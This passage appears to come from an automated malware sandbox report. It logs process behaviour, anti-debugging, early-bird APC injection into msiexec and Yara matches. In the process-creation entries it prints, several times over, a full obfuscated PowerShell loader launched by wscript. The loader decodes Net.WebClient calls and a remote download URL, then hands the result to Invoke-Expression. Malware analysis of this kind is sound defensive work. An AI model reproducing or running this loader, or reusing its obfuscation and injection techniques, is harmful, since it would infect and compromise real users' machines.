              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_092E29A8 rdtsc 5_2_092E29A8
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5124Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4787Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 8209Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1461Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7524Thread sleep time: -2767011611056431s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7920Thread sleep time: -922337203685477s >= -30000sJump to behavior
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: powershell.exe, 00000002.00000002.2423263275.00000298B846B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW0
              Source: msiexec.exe, 00000008.00000002.2700386932.0000000008386000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
              Source: msiexec.exe, 00000008.00000002.2700386932.000000000832A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW@
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior

              Anti Debugging

              barindex
              Hides threads from debuggers
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread information set: HideFromDebuggerJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread information set: HideFromDebuggerJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess queried: DebugPortJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_092E29A8 rdtsc 5_2_092E29A8
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_07826DBD LdrInitializeThunk,5_2_07826DBD

              HIPS / PFW / Operating System Protection Evasion

              barindex
              Early bird code injection technique detected
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created / APC Queued / Resumed: C:\Windows\SysWOW64\msiexec.exeJump to behavior
              Yara detected Powershell download and execute
              Source: Yara matchFile source: amsi64_7364.amsi.csv, type: OTHER
              Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 7364, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 7808, type: MEMORYSTR
              Queues an APC in another process (thread injection)
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread APC queued: target process: C:\Windows\SysWOW64\msiexec.exeJump to behavior
              Writes to foreign memory regions
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\SysWOW64\msiexec.exe base: 4460000Jump to behavior
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#Subnutritious Uninstructedness snigvejen Sortilegi #><#Diectasis Rodfunktioner Brdristens Sangerne #>$Bortfaldenes='Obskniteters';function Allemandes($Erhvervsgeografien){If ($host.DebuggerEnabled) {$nickelodeons=4} for ($Thimotheuss=$nickelodeons;;$Thimotheuss+=5){if(!$Erhvervsgeografien[$Thimotheuss]) { break }$Adgangskortenes55+=$Erhvervsgeografien[$Thimotheuss]}$Adgangskortenes55}function Xylotomies207($Sablende){ .($Douser) ($Sablende)}$Samandura=Allemandes 'BeteN TjeE inttRace. DelWSteneJustb FutCBacklTheoIRensEKagenRecat';$Trolls=Allemandes 'KonsMDrivo lluzHvlbipicklReprl J.naTold/';$Tereu=Allemandes 'NonaTGo.ilBegosEpid1 Opk2';$Tapeline=' Kat[ GuendelmeProit pro. UkoSAnakeMon.r.eacvla,gI R.fC SumeCorypCromo erIKjo nTopftSicum umoaForsN oraSoftgAeaceAffiRSpy ]endi:Liga: ,veSRevleYeascMareUBundrSvrniRoulTTi byin oP w nRLumboLaocT Foro zencToplOc rvLBars= Fer$OvartdiveE ReirB neEDen U';$Trolls+=Allemandes ' Tub5Firb.Sing0Rger Ngle(E,shWSel iBrs.n Li,dAfproGraywWronsOpsv H,ksN.ranTB dm Tyr 1Afko0Nonf.Unsp0Char; Kab nkuWB skiThu nLose6U su4Elec;svin Theox nom6Alge4,ice;U,ve n.nrKa.evAwfu:Spur1E.vi3H pe1F sh.Metr0 Enc)afna BegaG Greeel zcPrenkGrapoDekl/Mine2Aris0Semi1.ini0tvan0 Ano1Fr n0 Sol1alb, inF einiGrnsrSlove,verfPr voImbrxVisu/,ide1Alla3F,is1 He .,rem0';$Floristernes=Allemandes ' BreUPulssGuide PasrEnso-jestA Br GCus ENo tnMrkeT';$Infinitively=Allemandes 'NonmhArmvtBekrtSpanp uersWa e:Akry/Soc./ vrdd otr .uciTranv SereStag.SatrgHjeroableoCensg LaplExcieinte.vandcPoetoSu fm Ska/H teupr mc rk?Overe enxDecapruntoMararbro tKnob=tabudSe ioPropwOstenBar.llustoRivea Re dOrga& Geni haedDith=.lot1 rekzheadiMeloYStkyxC unCKummjDe.kUDescv.egij No.9Acra9TranQEna tVa.mXKolaQiracjPostBPianjTereAFacex BihM B osRegne AdemU saosysi3CondELondXBill9adonDvapu8Stanj';$Chroococcoid=Allemandes 'Malp>';$Douser=Allemandes 'GirgILrebEPegbx';$Jakey='Risting';$Undepreciatory='\Malodourously.dar';Xylotomies207 (Allemandes 'Glue$BeclgAfbll TesoVrisb InqA lazlNomi:AtroB.eetrI quI .ubsthinKffes=Feb,$Jus eElixNWoohVSvam:OppuA UnppRan pNo,mdHa vA Ma t s nAAnti+Af.a$LedeuS erNN veDDokuEAtomP BanrV,teEDadacHjruI AnbA,hilt nnooDoseRRe lY');Xylotomies207 (Allemandes 'Abat$AdelGM isLSuppo TarBFag,aC smL .es:HusmoNoduM Ti sIu iaaarst BistCannECell=E.en$ GavICallnOverfSkumIOverNLapiIUdb,tR ndisabbvweire An.lMissYKobl. U ssSlipPPa,iLRastI S mT ice( S,o$ egicDa kHGasmrUnsioOp,uORe,lC TurO.patcCoadCKar.o BorI ,ukDlde )');Xylotomies207 (Allemandes $Tapeline);$Infinitively=$Omsatte[0];$Unpositively=(Allemandes ' Del$Eu,aGU koLVa eONiccb Kn AHiplLB yg:HaarwSupeiT.mmECathNSl eERetiRNumibA teRTanddKompsCavasqua TD,loNReprG PlueLysnrcandNJrg e Gei=ImpeNDu dEtit WS en-RaadoVanrb Lo jOmdmEV ndCBrieT ykn Tecssel YRg.osfalsT BonEDe,lM Afs.Auke$UnchSPoliATorfM tudASandNPam D Flau FelRLaurA');Xylotomies207 ($Unpositively);Xylotomies207 (Allemandes ' T,e$BoucW periJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"Jump to behavior
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "<#subnutritious uninstructedness snigvejen sortilegi #><#diectasis rodfunktioner brdristens sangerne #>$bortfaldenes='obskniteters';function allemandes($erhvervsgeografien){if ($host.debuggerenabled) {$nickelodeons=4} for ($thimotheuss=$nickelodeons;;$thimotheuss+=5){if(!$erhvervsgeografien[$thimotheuss]) { break }$adgangskortenes55+=$erhvervsgeografien[$thimotheuss]}$adgangskortenes55}function xylotomies207($sablende){ .($douser) ($sablende)}$samandura=allemandes 'beten tjee inttrace. delwstenejustb futcbackltheoirensekagenrecat';$trolls=allemandes 'konsmdrivo lluzhvlbipicklreprl j.natold/';$tereu=allemandes 'nonatgo.ilbegosepid1 opk2';$tapeline=' kat[ guendelmeproit pro. ukosanakemon.r.eacvla,gi r.fc sumecorypcromo erikjo ntopftsicum umoaforsn orasoftgaeaceaffirspy ]endi:liga: ,vesrevleyeascmareubundrsvrniroultti byin op w nrlumbolaoct foro zenctoploc rvlbars= fer$ovartdivee reirb needen u';$trolls+=allemandes ' tub5firb.sing0rger ngle(e,shwsel ibrs.n li,dafprograywwronsopsv h,ksn.rantb dm tyr 1afko0nonf.unsp0char; kab nkuwb skithu nlose6u su4elec;svin theox nom6alge4,ice;u,ve n.nrka.evawfu:spur1e.vi3h pe1f sh.metr0 enc)afna begag greeel zcprenkgrapodekl/mine2aris0semi1.ini0tvan0 ano1fr n0 sol1alb, inf einigrnsrslove,verfpr voimbrxvisu/,ide1alla3f,is1 he .,rem0';$floristernes=allemandes ' breupulssguide pasrenso-jesta br gcus eno tnmrket';$infinitively=allemandes 'nonmharmvtbekrtspanp uerswa e:akry/soc./ vrdd otr .ucitranv serestag.satrghjeroableocensg laplexcieinte.vandcpoetosu fm ska/h teupr mc rk?overe enxdecapruntomararbro tknob=tabudse iopropwostenbar.llustorivea re dorga& geni haeddith=.lot1 rekzheadimeloystkyxc unckummjde.kudescv.egij no.9acra9tranqena tva.mxkolaqiracjpostbpianjtereafacex bihm b osregne ademu saosysi3condelondxbill9adondvapu8stanj';$chroococcoid=allemandes 'malp>';$douser=allemandes 'girgilrebepegbx';$jakey='risting';$undepreciatory='\malodourously.dar';xylotomies207 (allemandes 'glue$beclgafbll tesovrisb inqa lazlnomi:atrob.eetri qui .ubsthinkffes=feb,$jus eelixnwoohvsvam:oppua unppran pno,mdha va ma t s naanti+af.a$ledeus ernn veddokueatomp banrv,teedadachjrui anba,hilt nnoodoserre ly');xylotomies207 (allemandes 'abat$adelgm islsuppo tarbfag,ac sml .es:husmonodum ti siu iaaarst bistcannecell=e.en$ gavicallnoverfskumiovernlapiiudb,tr ndisabbvweire an.lmissykobl. u ssslipppa,ilrasti s mt ice( s,o$ egicda khgasmrunsioop,uore,lc turo.patccoadckar.o bori ,ukdlde )');xylotomies207 (allemandes $tapeline);$infinitively=$omsatte[0];$unpositively=(allemandes ' del$eu,agu kolva eoniccb kn ahipllb yg:haarwsupeit.mmecathnsl eeretirnumiba tertanddkompscavasqua td,lonreprg pluelysnrcandnjrg e gei=impendu detit ws en-raadovanrb lo jomdmev ndcbriet ykn tecssel yrg.osfalst bonede,lm afs.auke$unchspoliatorfm tudasandnpam d flau felrlaura');xylotomies207 ($unpositively);xylotomies207 (allemandes ' t,e$boucw peri
              Source: unknownProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" "<#subnutritious uninstructedness snigvejen sortilegi #><#diectasis rodfunktioner brdristens sangerne #>$bortfaldenes='obskniteters';function allemandes($erhvervsgeografien){if ($host.debuggerenabled) {$nickelodeons=4} for ($thimotheuss=$nickelodeons;;$thimotheuss+=5){if(!$erhvervsgeografien[$thimotheuss]) { break }$adgangskortenes55+=$erhvervsgeografien[$thimotheuss]}$adgangskortenes55}function xylotomies207($sablende){ .($douser) ($sablende)}$samandura=allemandes 'beten tjee inttrace. delwstenejustb futcbackltheoirensekagenrecat';$trolls=allemandes 'konsmdrivo lluzhvlbipicklreprl j.natold/';$tereu=allemandes 'nonatgo.ilbegosepid1 opk2';$tapeline=' kat[ guendelmeproit pro. ukosanakemon.r.eacvla,gi r.fc sumecorypcromo erikjo ntopftsicum umoaforsn orasoftgaeaceaffirspy ]endi:liga: ,vesrevleyeascmareubundrsvrniroultti byin op w nrlumbolaoct foro zenctoploc rvlbars= fer$ovartdivee reirb needen u';$trolls+=allemandes ' tub5firb.sing0rger ngle(e,shwsel ibrs.n li,dafprograywwronsopsv h,ksn.rantb dm tyr 1afko0nonf.unsp0char; kab nkuwb skithu nlose6u su4elec;svin theox nom6alge4,ice;u,ve n.nrka.evawfu:spur1e.vi3h pe1f sh.metr0 enc)afna begag greeel zcprenkgrapodekl/mine2aris0semi1.ini0tvan0 ano1fr n0 sol1alb, inf einigrnsrslove,verfpr voimbrxvisu/,ide1alla3f,is1 he .,rem0';$floristernes=allemandes ' breupulssguide pasrenso-jesta br gcus eno tnmrket';$infinitively=allemandes 'nonmharmvtbekrtspanp uerswa e:akry/soc./ vrdd otr .ucitranv serestag.satrghjeroableocensg laplexcieinte.vandcpoetosu fm ska/h teupr mc rk?overe enxdecapruntomararbro tknob=tabudse iopropwostenbar.llustorivea re dorga& geni haeddith=.lot1 rekzheadimeloystkyxc unckummjde.kudescv.egij no.9acra9tranqena tva.mxkolaqiracjpostbpianjtereafacex bihm b osregne ademu saosysi3condelondxbill9adondvapu8stanj';$chroococcoid=allemandes 'malp>';$douser=allemandes 'girgilrebepegbx';$jakey='risting';$undepreciatory='\malodourously.dar';xylotomies207 (allemandes 'glue$beclgafbll tesovrisb inqa lazlnomi:atrob.eetri qui .ubsthinkffes=feb,$jus eelixnwoohvsvam:oppua unppran pno,mdha va ma t s naanti+af.a$ledeus ernn veddokueatomp banrv,teedadachjrui anba,hilt nnoodoserre ly');xylotomies207 (allemandes 'abat$adelgm islsuppo tarbfag,ac sml .es:husmonodum ti siu iaaarst bistcannecell=e.en$ gavicallnoverfskumiovernlapiiudb,tr ndisabbvweire an.lmissykobl. u ssslipppa,ilrasti s mt ice( s,o$ egicda khgasmrunsioop,uore,lc turo.patccoadckar.o bori ,ukdlde )');xylotomies207 (allemandes $tapeline);$infinitively=$omsatte[0];$unpositively=(allemandes ' del$eu,agu kolva eoniccb kn ahipllb yg:haarwsupeit.mmecathnsl eeretirnumiba tertanddkompscavasqua td,lonreprg pluelysnrcandnjrg e gei=impendu detit ws en-raadovanrb lo jomdmev ndcbriet ykn tecssel yrg.osfalst bonede,lm afs.auke$unchspoliatorfm tudasandnpam d flau felrlaura');xylotomies207 ($unpositively);xylotomies207 (allemandes ' t,e$boucw peri
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "<#subnutritious uninstructedness snigvejen sortilegi #><#diectasis rodfunktioner brdristens sangerne #>$bortfaldenes='obskniteters';function allemandes($erhvervsgeografien){if ($host.debuggerenabled) {$nickelodeons=4} for ($thimotheuss=$nickelodeons;;$thimotheuss+=5){if(!$erhvervsgeografien[$thimotheuss]) { break }$adgangskortenes55+=$erhvervsgeografien[$thimotheuss]}$adgangskortenes55}function xylotomies207($sablende){ .($douser) ($sablende)}$samandura=allemandes 'beten tjee inttrace. delwstenejustb futcbackltheoirensekagenrecat';$trolls=allemandes 'konsmdrivo lluzhvlbipicklreprl j.natold/';$tereu=allemandes 'nonatgo.ilbegosepid1 opk2';$tapeline=' kat[ guendelmeproit pro. ukosanakemon.r.eacvla,gi r.fc sumecorypcromo erikjo ntopftsicum umoaforsn orasoftgaeaceaffirspy ]endi:liga: ,vesrevleyeascmareubundrsvrniroultti byin op w nrlumbolaoct foro zenctoploc rvlbars= fer$ovartdivee reirb needen u';$trolls+=allemandes ' tub5firb.sing0rger ngle(e,shwsel ibrs.n li,dafprograywwronsopsv h,ksn.rantb dm tyr 1afko0nonf.unsp0char; kab nkuwb skithu nlose6u su4elec;svin theox nom6alge4,ice;u,ve n.nrka.evawfu:spur1e.vi3h pe1f sh.metr0 enc)afna begag greeel zcprenkgrapodekl/mine2aris0semi1.ini0tvan0 ano1fr n0 sol1alb, inf einigrnsrslove,verfpr voimbrxvisu/,ide1alla3f,is1 he .,rem0';$floristernes=allemandes ' breupulssguide pasrenso-jesta br gcus eno tnmrket';$infinitively=allemandes 'nonmharmvtbekrtspanp uerswa e:akry/soc./ vrdd otr .ucitranv serestag.satrghjeroableocensg laplexcieinte.vandcpoetosu fm ska/h teupr mc rk?overe enxdecapruntomararbro tknob=tabudse iopropwostenbar.llustorivea re dorga& geni haeddith=.lot1 rekzheadimeloystkyxc unckummjde.kudescv.egij no.9acra9tranqena tva.mxkolaqiracjpostbpianjtereafacex bihm b osregne ademu saosysi3condelondxbill9adondvapu8stanj';$chroococcoid=allemandes 'malp>';$douser=allemandes 'girgilrebepegbx';$jakey='risting';$undepreciatory='\malodourously.dar';xylotomies207 (allemandes 'glue$beclgafbll tesovrisb inqa lazlnomi:atrob.eetri qui .ubsthinkffes=feb,$jus eelixnwoohvsvam:oppua unppran pno,mdha va ma t s naanti+af.a$ledeus ernn veddokueatomp banrv,teedadachjrui anba,hilt nnoodoserre ly');xylotomies207 (allemandes 'abat$adelgm islsuppo tarbfag,ac sml .es:husmonodum ti siu iaaarst bistcannecell=e.en$ gavicallnoverfskumiovernlapiiudb,tr ndisabbvweire an.lmissykobl. u ssslipppa,ilrasti s mt ice( s,o$ egicda khgasmrunsioop,uore,lc turo.patccoadckar.o bori ,ukdlde )');xylotomies207 (allemandes $tapeline);$infinitively=$omsatte[0];$unpositively=(allemandes ' del$eu,agu kolva eoniccb kn ahipllb yg:haarwsupeit.mmecathnsl eeretirnumiba tertanddkompscavasqua td,lonreprg pluelysnrcandnjrg e gei=impendu detit ws en-raadovanrb lo jomdmev ndcbriet ykn tecssel 